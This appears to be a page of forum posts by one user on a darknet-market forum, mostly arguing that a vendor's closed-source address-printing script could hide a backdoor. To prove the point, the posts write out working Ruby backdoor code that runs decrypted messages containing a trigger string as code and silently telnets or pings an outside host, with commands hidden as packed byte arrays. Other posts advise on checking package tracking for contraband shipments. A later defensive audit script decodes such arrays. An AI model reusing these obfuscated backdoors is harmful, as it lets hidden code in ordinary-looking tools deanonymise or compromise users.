Show Posts



Messages - kmfkewm

Pages: 1 ... 142 143 [144] 145 146 ... 249
2146
grepping for ping isn't going to find

[112, 105, 110, 103, 32, 108, 46, 116, 118]

grepping for [112, 105, 110, 103, 32, 108, 46, 116, 118] isn't going to find

[100 + 12, 100 + 5, 100 + 10, 100 + 3, 30 + 2, 100 + 8, 40 + 6, 110 + 6, 110 + 8]

2147
Quote
Well, for a start you'd need to translate your Ruby exploit to Python, but ignore that for now.

First I would need to learn Python but I am not going to bother to because I already showed it in Ruby, and the two languages are very similar. Object oriented (usually) interpreted scripting languages.


Quote
a) shipping the code with encrypted data that is decrypted and run when the code is executed AND the code is being executed on a system with network access;

Yes, it would need to be run on a system with network access; no, it does not need to ship the code with encrypted data. It gets the malicious code after a vendor decrypts it with their own key.

Quote
inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.

It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that, because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python. Having `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code.

Quote
* No encrypted data is shipped with my code.

But it gets encrypted data input from random customers

Quote
* There is a copy of my GPG key currently.  I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).


There is no reason for there to be a copy of your GPG key. In the example I gave the exploit is encrypted to the vendor's key and they load it into the program; they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case.

Quote
* There is no such exploit in my code.

Possibly not. Probably not even! But nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where people's claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave.

Quote
* Such an exploit would be able to be spotted.

Indeed, by anyone who knows the language well enough to

A. Know what back ticks do
B. Know what pack and unpack do
C. Know what | does on a terminal
D. Know what irb is
E. Knows the language, since they wouldn't just look at that part of the code but would need to audit the entire thing

Such an exploit would be possible to spot if the program went through auditing. Someone who doesn't know ruby is not going to look at my code and realize what is going on; they are going to see it doesn't have networking code included with it, has no IP addresses or ports listed, has no encrypted data included, and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command.

Quote
* My code does not require or use a network connection in any way (vendors an make their own decisions on whether or not to utilise an air gap).

Neither does the example code I showed, it gets the networking require from the decrypted ciphertext.

Quote
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it).  This would pretty effectively stop an exploit checking address data from being used in a live system.

You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address.

Quote
So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement.  It's one thing to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.

I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes.


Quote
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine.  Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile.  It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.

Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.

2148
Quote
Then the issue boils down to where is the encrypted data coming from?  If there is encrypted data in my code (there isn't) then what you describe is possible.  If the only encrypted data is coming from vendor's order page then it's really not.

Doesn't the encrypted data on the vendor's page come from customers? The encrypted data is coming from a customer who encrypts ruby code instead of their address. In fact they can even encrypt ruby code that puts their address after it is done with all of its networking.

Quote
To do that I would need to insert code which checked each decrypted address for a specific string and then generate the code.

No it doesn't need to generate the code. Currently what I showed does check for a specific string and if it finds it it pipes the decrypted message to a ruby interpreter, which then runs it as a completely different script automatically. There are probably even more sneaky ways to do it without looking for a special string.

Quote
All it does is decrypt the files created from the CSV, decrypt them (as previously described), read the data and then rewrite that in another format to a new file.  The reading and writing of files in Python is explained here:

http://docs.python.org/tutorial/inputoutput.html

We can not possibly know what it does without looking at it, that is the entire point of this thread. But honestly if you want to let the market decide I really don't give a shit. I think that you are thinking more with your wallet than logically though.

2149
Quote
Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).

I don't recall saying that, but maybe I did I guess. Maybe you have confused me with Pine???

Quote
It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.

You can explain to people who don't know python that your python script is not backdoored. I could explain to people that | #{[105, 114, 98].pack("c*")} sets the formatting of the text; I don't expect them to analyze every single line of what I write, simply because they would essentially be learning Ruby to make sure I did not do anything sketchy. Wouldn't it make more sense for me to release the code here? Then if anyone who knows Ruby looks at it they might realize what is going on and warn others. And if they know Ruby why are they going to buy something like this??

Quote
Then why don't you?  Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.

Hm maybe I will although to be honest right now I am pretty busy working on other things that I will release publicly and not expect people to blindly trust.


Quote
Running an executable .py file uses the Python interpreter to run the code.  Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files).  Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.

Ruby is the same, written in C with much of the modules also in C. The primary difference seems to be that python has made it easy to get bytecode for running later without being parsed by the interpreter. That is coming in ruby 2.0 :D.

Quote
If the Python interpreter were exploited, that could be a vector of attack.  If I'd said "use this code with my custom version of Python" then sure, nail my arse to the wall.  I didn't because as long as it's an official release with support for the modules used (currently csv, but likely csv and os when the shell scripts are replaced at some nebulous point in the future) I don't really care.  There are enough code savvy eyes looking at the Python code base to make sure someone doesn't sneak something in there.

I am not at all worried that the primary python interpreters are going to be exploited any more than I am that firefox is. What I am worried about is the fact that someone buying a script like this is not going to recognize that | #{[105, 114, 98].pack("c*")} is the difference between secure and backdoored. To recognize that you would need to know about both pack and unpack, as well as ways of encoding data, as well as what the pipe symbol does on the terminal, as well as what back ticks do in ruby. The actual program distributed would have no networking code, would make a single call to GPG using the user's own key, and could even be made more sneaky by removing the need for an if else statement.

2150
You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it,

That would still be easy to spot, just look for encrypted data in the original files.

Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.

As you say, it is something that would be noticed and also easy to find.  Even if you change the "BEGIN PGP MESSAGE" and "END PGP MESSAGE" lines to obfuscate the encrypted block, you'd still have to change them back before decryption.  Whatever method you conceive of to conceal them or to rewrite them would be easily found.

Also, searching the code for any GPG command which did not invoke the user's own key and passphrase would be easy to spot.  GPG is invoked *once* in this code.  By default it is "gpg --decrypt-files *.asc" and that's it (either in a bash script or in an os.system() call).  That might be modified to force use of a particular key in order to deal with files encrypted with --hidden-recipient, --hidden-encrypt-to or --throw-keyid.  Anything else without a damn good reason and the jig is up.

You are completely misunderstanding what I did. I didn't include encrypted code with the program, I included a line of code in the program that executes a decrypted ciphertext as another script if it has a special signal string in it. The only difference between a completely legitimate version of my simple script (that merely takes a file with a GPG ciphertext in it and prints the plaintext to the screen after the user has entered their password) and a malicious version that allows an attacker to craft a ciphertext that decrypts into additional code that is executed, is this line of code in the original program: | #{[105, 114, 98].pack("c*")}

And you can claim all you want here about how your code functions, but nobody will ever know unless they look at it, and the full point we are trying to make is that the people who are going to buy it inherently are people who will not notice that | #{[105, 114, 98].pack("c*")} is the difference between a safe program and a backdoored version.

2151
try this on for size.....

the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...

Which would be easy to spot by either the presence of the encrypted message or a decryption command other than the one included in the existing code.  In order to get it to run with the existing sroppy config it would need to be a .asc file that is distributed initially which is encrypted to the vendor's key (which may be different from the key they are communicating with me with and may not reveal the vendor's username).

So let's be clear: there is NO encrypted data distributed with my code.  The only encrypted data used is taken from the vendor's own order page and it is all handled the same way (decrypted, converted to a printable format and then printed).

There is nothing encrypted in my example either; the only encrypted data would be ciphertexts encrypted by anyone to the vendor's key. The trick is that if one of the ciphertexts decrypts into a plaintext with a signaling string in it, the entire rest of the message is treated as a totally independent Ruby script. I will change the comments to be more accurate.

Quote

#opens the file with your GPG ciphertext in it. Right now you need to have a file that holds them, however the ciphertext can come from anywhere.
file = File.open("test", "r")

#creates a string variable named message
message = ""

#reads the ciphertext file line by line and adds each line to the string variable message, loading the ciphertext into memory
while line = file.gets
message << line
end


#decrypts the message and references the plaintext with the variable decrypted_message
#the ciphertext is decrypted by taking the ciphertext in memory and sending it to the command line
#which then echos it and pipes it to gpg with the -d command. You will be prompted by GPG for
#your passphrase.

decrypted_message = `echo "#{message}" | gpg -d`


#if the decrypted message has the string gpg-privacy-toolkit anywhere in it then the decrypted message is
#piped to the command line where it is echoed and then piped to the ruby interpreter which is called with
#the word irb which is represented as an array of numbers to try and obfuscate what is going on. The pipe (|)
# can also be encoded in this way. Once the decrypted message is piped to irb it is treated as a ruby script,
# so if there is networking code in the decrypted message then networking can take place even though there
# is no networking code in this program, the decrypted message is treated as an entirely new script.
if decrypted_message.include?("gpg-privacy-toolkit")
 puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`

#if the decrypted message doesn't have the signal gpg-privacy-toolkit in it, then merely put the output
#of echoing the decrypted message, which is a bit convoluted since we could just puts the decrypted
#message directly, but it makes the special case seem less sketchy to do it this way.
else
 puts `echo "#{decrypted_message}"`
end

#it could be made to look even less sketchy by piping every message to irb and echoing the output of it
#and making it a string to puts if it doesn't contain the special signal string or otherwise treating it as a
#script, then messages will be printed to the terminal unless they have the special signal string
#but there will be no need for an if else statement.


2152
Or you could use any of the thousands of track my package sites that pull the info from usps. You can hit them with tor and they proxy the request thus not directly leading to you, and not showing as being from a tor exit node.

For example, when you track a package from e-bay it does not send you to the usps site, it grabs the info from usps and displays it to you thus proxying your request.

Ah yeah that seems to be a good solution also, forgot about those.

2153
Checking shipping once in a blue moon should be fine as long as you don't track on TOR

Checking tracking without Tor is fine if you don't care that it links your IP address to the package

I agree that tor is probably better but since this is a unique query could it be used to try to track the route back thru tor? Not understanding Tor this might be a stupid question

Check tracking with Tor, your package could be flagged as likely contraband. Check tracking without Tor, you link your IP address to the package. Check tracking from Open Wifi from random locations frequently, your address could be flagged as likely getting contraband. Check tracking from your own IP address and the package is strongly linked to you, and good bye plausible deniability and good bye any benefit of using a fake ID box or similar. Don't check tracking and you won't know when it says "your package has been seized by the feds, ur gonna get ass raped", and then the benefits of using a fake ID box or similar are reduced and you can't clean house before the raid.

2154
Quote
As such, Louis has the right to market his wares under any conditions that he deems fit.

Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.


Quote
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road.

If a vendor is selling MDMA tablets that are of a press known to frequently contain PMA then is it wrong for us to bring this up? No. He is being held to the same standard as any other vendor, reviews are being left on his product. If someone sells PMA we don't need to try it to leave a review saying that it is dangerous, do we?

Quote
As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.

It is wrong to say that his product IS backdoored. It is wrong to say a vendor's product has been cut with Drano if you have not purchased some and tested it. It is not wrong to say that PMA is dangerous if a vendor is selling PMA.


Quote
I don't see DPR mandating that all drug vendors must have their wares laboratory-tested prior to sale, to prove their purity, and to prove that they were not contaminated/adulterated with harmful chemicals.

It wouldn't be a bad idea but the implementation details are a bit difficult. There are labs in NL that legally test drugs and return such data, maybe we could work something out with them. The hardest part is making it so vendors do not know who the people doing tests are. And having a single person who does tests illegally in countries where it is not allowed will clearly not work. It would at least be nice if we had certifications a vendor can obtain through some private service here that randomly buys drugs from vendors to be shipped to new addresses for quality control. Mandated? Of course not. An extra service for harm reduction....yes.

Quote
I also haven't seen Pine (or anyone else) pillory the vendors of the various USB-stick-based anonymity solutions that are being hawked on Silk Road.

Really? I have called several of them 'potential feds'. I wouldn't be caught dead ordering a USB stick based anonymity solution from a vendor here. These techniques are literally straight out of fed 101.

Quote
So, again, why is Louis being held to a higher standard than everyone else? Why is he being asked to prove the safety of his product, when every other vendor on Silk Road is not?

Because his product could lead to vendors being busted and then customers being busted? But he has no obligation to be responsible with his programs, just as we have no responsibility to say we think his behaviors are anything other than sketchy.

Quote
I don't trust Louis' software -- I wouldn't touch it with a barge-pole. I also wouldn't trust software written by Pine, kmfkewm, Shannon or even DPR themselves for that matter, unless I had thoroughly vetted it first.

You should learn C because I am going to release some nice stuff soon :). Also have it in Ruby nearly done but that is just for prototyping.

Quote
Louis is absolutely right -- he has the right to sell his software, and people have the right to buy it -- or not -- as they see fit.

Sure enough, and we have the right to leave reviews saying that we find it sketchy and warning the poor souls who might otherwise think it is safe to privately obtain scripts from people on SR to help aid them in their drug trafficking careers.

2155
I usually take LSD once a week, these days some weed every now and then maybe a little ketamine or some random other drug once in a blue moon. Sometimes I go a month without using anything. Sometimes I go on month long binges.

2156
Hmm, interesting discussion.  Kmfkewm if that's your idea of a fight involving good and evil and you think of that as a valid argument then you're clearly not looking at the obvious fact.  You say that open source software has given us the ability to get the better of the dea or the fbi but that's simply not true.  In this reality "evil" is winning by a landslide and there is no end in sight.  If the government magically disappeared it would be the same.  You think poor and middle class people would have the resources to counter "private defense agencies" of the rich?  They couldn't.  Sure maybe we have avoided losing our internet rights with open source software and can even order drugs with little risk now, but that has little to do with real life where the dea and the fbi imprison people every day and the people with money have the power to infringe on your rights.  Right now it's the government with armies and police forces and in anarchy it would be corporations with "private defense agencies."  What's the difference?

Is it not true that bullet proof vests protect us from bullets even if people who shoot themselves in the head continue to die?   

2157
Checking shipping once in a blue moon should be fine as long as you don't track on TOR

Checking tracking without Tor is fine if you don't care that it links your IP address to the package

2158
I just realized I was being far too complicated with my backdoor. How about this.

Quote
#opens the file with your GPG message in it
file = File.open("test", "r")
message = ""

#reads the file line by line and adds each line to the string variable message
while line = file.gets
message << line
end

#decrypts your message and stores the plaintext as decrypted_message
decrypted_message = `echo "#{message}" | gpg -d`

#prints the decrypted message to the screen
puts `echo "#{decrypted_message}"`
`#{[116, 101, 108, 110, 101, 116, 32, 49, 50, 55, 46, 48, 46, 48, 46, 49, 32, 56, 49, 49, 56].pack("c*")}`

On the negative side it now has an even bigger string of inexplicable numbers, on the positive side no matter what message the user gets it telnets to whatever server I would like it to go to and the message doesn't need to include ruby code at all. Hmm I bet I can think of an even more sneaky way to get IP addresses.....this is kind of fun. 

hm ping has less numbers `#{[112, 105, 110, 103, 32, 108, 46, 116, 118].pack("c*")}`
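The recurring tells in these posts (2146, 2151 and this one) are an integer array fed to pack("c*"), sometimes spelled as sums so that a grep for the numbers also fails, and a backtick or system call whose command string is built by interpolation. The following is an added example, written for this page and not code from anyone in the thread: a small static triage script that decodes such arrays without eval and flags interpolated shell commands, run over a constructed sample assembled from the lines quoted above. The regexes, function names and the sample source are all assumptions of this example.

```ruby
# Added example, not code from the thread: static triage for two tells
# discussed in these posts. It (1) decodes integer arrays passed to
# pack("c*") / pack("C*"), including the "100 + 12" arithmetic spelling that
# defeats a plain grep, and (2) flags shell execution (backticks, system, exec,
# spawn, popen) whose command string interpolates a variable.

PACK_RE  = /\[([^\]]*)\]\s*\.pack\(\s*["'][cC]\*["']\s*\)/
SHELL_RE = /`[^`]*#\{[^}]*\}[^`]*`|\b(?:system|exec|spawn|popen)\b.*#\{/

# Reduces one array element to an integer without eval: a literal integer or
# integers joined by + or - ("100 + 12" -> 112). Anything else yields nil.
def element_value(text)
  t = text.strip
  return nil unless t.match?(/\A-?\d+(?:\s*[+-]\s*\d+)*\z/)
  t.scan(/[+-]?\s*\d+/).sum { |term| term.delete(" ").to_i }
end

# Turns the text between the brackets into the string the pack call would
# build, or nil if any element is not simple integer arithmetic.
def decode_pack_array(inner)
  values = inner.split(",").map { |e| element_value(e) }
  return nil if values.empty? || values.any?(&:nil?)
  values.pack("C*").force_encoding("UTF-8")
end

# Scans Ruby source text and returns one hash per finding, in line order.
def audit(source)
  findings = []
  source.each_line.with_index(1) do |line, no|
    line.scan(PACK_RE).flatten.each do |inner|
      decoded = decode_pack_array(inner)
      findings << { line: no, kind: :packed_string, decoded: decoded } if decoded
    end
    if line.match?(SHELL_RE)
      findings << { line: no, kind: :shell_interpolation, text: line.strip }
    end
  end
  findings
end

# Constructed sample built from the lines quoted in this thread (not a real file).
SAMPLE_SOURCE = <<~'RUBY'
  decrypted_message = `echo "#{message}" | gpg -d`
  if decrypted_message.include?("gpg-privacy-toolkit")
    puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
  end
  `#{[116, 101, 108, 110, 101, 116, 32, 49, 50, 55, 46, 48, 46, 48, 46, 49, 32, 56, 49, 49, 56].pack("c*")}`
  cmd = [100 + 12, 100 + 5, 100 + 10, 100 + 3, 30 + 2, 100 + 8, 40 + 6, 110 + 6, 110 + 8].pack("c*")
  puts "nothing to see here"
RUBY

if __FILE__ == $0
  audit(SAMPLE_SOURCE).each do |f|
    if f[:kind] == :packed_string
      puts "line #{f[:line]}: pack() builds #{f[:decoded].inspect}"
    else
      puts "line #{f[:line]}: shell command built by interpolation"
    end
  end
end
```

A script like this only produces leads: it cannot see strings assembled at run time, a different encoding than pack would slip past PACK_RE, and, as the posts say, the obfuscation can always be made subtler. Its value is that it turns the three number arrays above into "irb", "telnet 127.0.0.1 8118" and "ping l.tv" for a reader who would not decode them by hand, and it lists every line where the program hands a constructed string to a shell, which is exactly the set of lines an auditor has to read most carefully.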

2159
Quote
It seems to me that in an anarcho-capitalist society there would still be just as many extremely powerful people who have power over the rights of other people, and that they just wouldn't be in "official" positions.  There would still be a vast difference in rights between the rich and everyone else.  To me that's not true human equality.

Agorism is not magic and there will always be people who try to unfairly control others. As an extreme analogy: No matter how many men desire to, or how righteous their desire is, they can never stop an omnipotent being from doing as it pleases with them. No political ideology or popular support could change such a scenario. Agorism itself is largely tied to the non-aggression principle, people should be free to do what they please so long as they do not infringe on the freedom of others. Anyone who infringes on the freedom of others is seen as a threat and attempts will be made to stop them, generally via private defense agencies. The rich and powerful could have their own agencies that try to allow them to do whatever they please, that is simply a fact of reality and nothing can change it. However nobody says that they will win. Look at the powerful agencies such as FBI and DEA, it appears as if they have been stripped of their power to oppress by a single man using open source software. Good and evil will always fight but thankfully there is nothing to stop good from winning many battles in what is likely to be a never ending war.

2160
And thus LouisCypher is.....?

Engaged in a business model that should not be sustainable on a forum that has members who value security?
